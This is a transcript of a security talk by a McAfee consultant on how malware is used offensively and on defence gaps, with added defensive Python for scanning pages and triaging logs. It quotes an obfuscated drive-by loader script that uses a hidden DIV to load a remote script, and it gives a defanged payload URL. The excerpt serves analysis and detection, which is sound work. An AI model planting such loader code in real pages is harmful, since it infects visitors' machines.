Offensive malware usage and defense
Transcript of Offensive malware usage and defense
Malware Offensive usage and how to defend
Christiaan Beek
McAfee Professional Services
Agenda
• $whoami
• Examples
• Offensive ways of using malware
• What goes wrong
• Defense recommendations
• Final thoughts
$whoami
• Christiaan Beek
• Practice lead IR & Forensics EMEA
• Developer/Instructor MFIRE
• Training CERTS
A Little Background
Foundstone Services – McAfee Strategic Security
OFFENSE
Offensive usage of malware
Sectors: Energy & Infra, Financial, Medical, Mobile, Defense
Offensive usage of malware
Why malware?
• low profile during preparation
• many options to spread / infect
• many ways to hide
• self-destruct mechanism
• many ways to transfer data to
Offensive usage of malware
• More and more discovery of malware frameworks
• Multiple modules /components
• Written by pros – sponsored by nations
Offensive - What’s Different?

| Development | Delivery | Detection | Command & Control | Intent |
|---|---|---|---|---|
| Nation-States | Zero day propagation | Digitally signed with compromised certificates | Central command | Surveillance |
| Truly customized payloads | Multi-vectored: Bluetooth, USB, network | Outbound exfiltration masking | Modular payloads | Disrupt / Destroy |
Stages of an attack: (four diagram-only slides)
Stages of an attack – first script

```html
<script type="text/javascript" src="swfobject.js"></script>
<script src=jpg.js></script>
<script type="text/javascript">
if(document.cookie.indexOf("DCHJEik8=")==-1 && hiOC2.indexOf("linux")<=-1 && hiOC2.indexOf("bot")==-1 &&
hiOC2.indexOf("spider")==-1)
var jMJFRp3=deconcept.SWFObjectUtil.getPlayerVersion();
var expires=new Date();
expires.setTime(expires.getTime()+1*60*60*1000);
document.cookie="DCHJEik8=Yes;path=/;expires="+expires.toGMTString();
for(WdkimKX2=0,gNRb4=true,sAgnGw8=["msie","firefox","opera"];gNRb4;WdkimKX2++){gNRb4=gNRb4 &&
(navigator.userAgent.toLowerCase().indexOf(sAgnGw8[WdkimKX2])>-1);if(WdkimKX2==sAgnGw8.length-
1)WdkimKX2=-1;}Hwqq6="0";delete Hwqq6;try{Hwqq6+="0"+"0";}catch(e){yltBe1=unescape;mYSdOxl6 =
eval;}CwefLf0="S1+ADphS1(hmacmx8)))^MqiovxR7);}try{new function(){EmIcO0(EJiD6);}}catch(e){try{new
function(){Qkrnq6=parseInt;vKFaTPR4(EJiD6);}}catch(e)
}
</script>
<DIV style="VISIBILITY: hidden; WIDTH: 0px; HEIGHT: 0px"><script language="javascript"
src="hxxp://count2.51yes……….. 31931&logo=12" charset="gb2312"></script></DIV>
```
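A defender-side triage script for pages like the excerpt above, added here as an example (it is not code from the talk). It flags the traits visible in that snippet: cookie-gated one-shot execution, filtering out crawler and Linux user agents, eval/unescape aliasing inside try/catch, and a hidden zero-size DIV that pulls a remote script. The sample HTML, the placeholder URL, the indicator weights and the threshold are all constructed for illustration.

```python
"""Heuristic triage of a suspected drive-by landing page (added example, not from the talk)."""
import re

# Constructed sample modelled on the snippet in the slides; the remote URL is a placeholder.
SAMPLE_HTML = """
<script type="text/javascript" src="swfobject.js"></script>
<script src=jpg.js></script>
<script type="text/javascript">
if(document.cookie.indexOf("DCHJEik8=")==-1 && ua.indexOf("linux")<=-1 && ua.indexOf("bot")==-1 &&
ua.indexOf("spider")==-1){
var expires=new Date();expires.setTime(expires.getTime()+1*60*60*1000);
document.cookie="DCHJEik8=Yes;path=/;expires="+expires.toGMTString();
try{x+="0"+"0";}catch(e){a=unescape;b=eval;}
}
</script>
<DIV style="VISIBILITY: hidden; WIDTH: 0px; HEIGHT: 0px"><script language="javascript"
src="http://counter.example.invalid/c.js" charset="gb2312"></script></DIV>
"""

# (name, pattern, weight). Weights are an assumption chosen for illustration.
INDICATORS = [
    # Runs once per victim: sets a marker cookie and skips if it is already present.
    ("cookie_gated_one_shot", re.compile(r'document\.cookie\.indexOf\("[^"]+"\)==-1'), 2),
    # Avoids crawlers and non-Windows clients so researchers and scanners see a benign page.
    ("crawler_ua_filter", re.compile(r'indexOf\("(bot|spider|linux)"\)', re.I), 2),
    # Aliases eval/unescape inside a try/catch to dodge simple string matching.
    ("eval_alias", re.compile(r'=\s*(eval|unescape)\s*;'), 2),
    # Invisible zero-size container loading a remote script (tracker or loader).
    ("hidden_div_remote_script",
     re.compile(r'visibility:\s*hidden[^>]*(width|height):\s*0px.*?<script[^>]*src=', re.I | re.S), 3),
    ("external_script_charset_gb2312", re.compile(r'<script[^>]*src=[^>]*charset="gb2312"', re.I), 1),
]

def scan_landing_page(html):
    """Return (score, [matched indicator names]) for one HTML document."""
    hits = [name for name, rx, _ in INDICATORS if rx.search(html)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    return score, hits

def verdict(html, threshold=5):
    """Classify as 'suspicious' or 'clean'; the threshold is an assumed tuning value."""
    score, hits = scan_landing_page(html)
    return ("suspicious" if score >= threshold else "clean"), score, hits

if __name__ == "__main__":
    print(verdict(SAMPLE_HTML))
```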
Final destination?:
hxxp://222.7x.xx.xx.xx/x.exe
Inner working?
IIS logs on hacked ‘landing’ server:

```
9/23/2012 4:06:16 70.49.x.x W3SVC1 80 GET /x.exe
9/23/2012 4:07:46 99.23.x.x W3SVC1 80 GET /x.exe
9/23/2012 4:08:25 93.80.x.x W3SVC1 80 GET /x.exe
9/23/2012 4:14:48 208.91.x.x W3SVC1 80 GET /x.exe
9/23/2012 4:36:05 95.27.x.x W3SVC1 80 GET /pay/x.exe
9/23/2012 5:15:23 208.91.x.x W3SVC1 80 GET /x.exe
9/23/2012 5:29:27 74.125.x.x W3SVC1 80 GET /x.exe
```

Dial 80 or 443
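A small log-triage routine for the kind of IIS entries shown above, added here as an example (not from the talk): it parses lines in the slide's layout, groups requests for executable payloads by URI, and lists clients that fetched the same payload more than once, which on a compromised landing server points at retries or re-infection. The sample lines are modelled on the slide with the client IPs masked as shown there; the list of payload extensions is an assumption to tune per environment.

```python
"""Triage of IIS log lines for payload downloads (added example, not from the talk)."""
from collections import Counter
from datetime import datetime

# Sample lines modelled on the slide (client IPs masked exactly as shown there).
SAMPLE_LOG = """\
9/23/2012 4:06:16 70.49.x.x W3SVC1 80 GET /x.exe
9/23/2012 4:07:46 99.23.x.x W3SVC1 80 GET /x.exe
9/23/2012 4:08:25 93.80.x.x W3SVC1 80 GET /x.exe
9/23/2012 4:14:48 208.91.x.x W3SVC1 80 GET /x.exe
9/23/2012 4:36:05 95.27.x.x W3SVC1 80 GET /pay/x.exe
9/23/2012 5:15:23 208.91.x.x W3SVC1 80 GET /x.exe
9/23/2012 5:29:27 74.125.x.x W3SVC1 80 GET /x.exe
"""

# File types a content web site has no business handing out; assumed list, tune per environment.
PAYLOAD_EXTENSIONS = (".exe", ".dll", ".scr", ".msi")

def parse_line(line):
    """Fields in the slide's layout: date time client-ip site port method uri-stem."""
    date, time, cip, site, port, method, uri = line.split()
    when = datetime.strptime(f"{date} {time}", "%m/%d/%Y %H:%M:%S")
    return {"when": when, "cip": cip, "site": site, "port": int(port), "method": method, "uri": uri}

def payload_downloads(log_text):
    """Group requests for payload-like files by URI: hit count, per-client counts, time span."""
    groups = {}
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        rec = parse_line(raw)
        if not rec["uri"].lower().endswith(PAYLOAD_EXTENSIONS):
            continue
        g = groups.setdefault(rec["uri"], {"hits": 0, "clients": Counter(),
                                           "first": rec["when"], "last": rec["when"]})
        g["hits"] += 1
        g["clients"][rec["cip"]] += 1
        g["first"] = min(g["first"], rec["when"])
        g["last"] = max(g["last"], rec["when"])
    return groups

def repeat_clients(groups):
    """Clients that fetched the same payload more than once: retries or re-infection."""
    return {uri: sorted(ip for ip, n in g["clients"].items() if n > 1)
            for uri, g in groups.items()}

if __name__ == "__main__":
    print(repeat_clients(payload_downloads(SAMPLE_LOG)))
```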
War story
Future usage of malware
Future scenarios (image-only slides)
Future scenarios or real...?
An Intel company
What goes wrong regarding Defense?
Problem #1
Many solutions but how to use them?
Forensic Readiness?
Problem #2
No visibility on the network
No correlation of events
Problem #3
Lack of skilled, experienced and dedicated people
Problem #4
No Incident Response procedures
No Dry-run exercise
Problem #5
The attack came from…
Problem #6
Destroying evidence
Problem #7
Who is the system owner?
Who will take action?
Who is allowed to take decisions?
Defense Strategies
The Big “Threat” Picture
Nested-sets diagram, outermost to innermost:
• All Threats
  • All Known Threats
    • Threats AntiVirus Sees
      • Threats AntiVirus Protects
        • Core
The “Core” Security Problem
• “Unauthorized” Execution
– Payload/attachment/link
– Network
– Privilege
• “Authorized” Execution
– Insiders misuse of privilege
Diagram: End Users = Data at the centre, surrounded by Identity Thieves, Spammers, Tool Developers, Vulnerability Discoverers, Malware Developers and a Bot Herder.
Defense-in-depth
Worthless without:
Final thoughts...
- Incidents happen
- Is forensic & malware readiness on your agenda?
- What needs to be changed in your process?
- Is your {army-unit/company/agency/etc} prepared?
- Did you separate critical infrastructures?
- Can we help you?
Thank you!
Keep in touch:
Email: Christiaan_Beek@McAfee dot com
Twitter: @FSEMEA @Foundstone @ChristaanBeek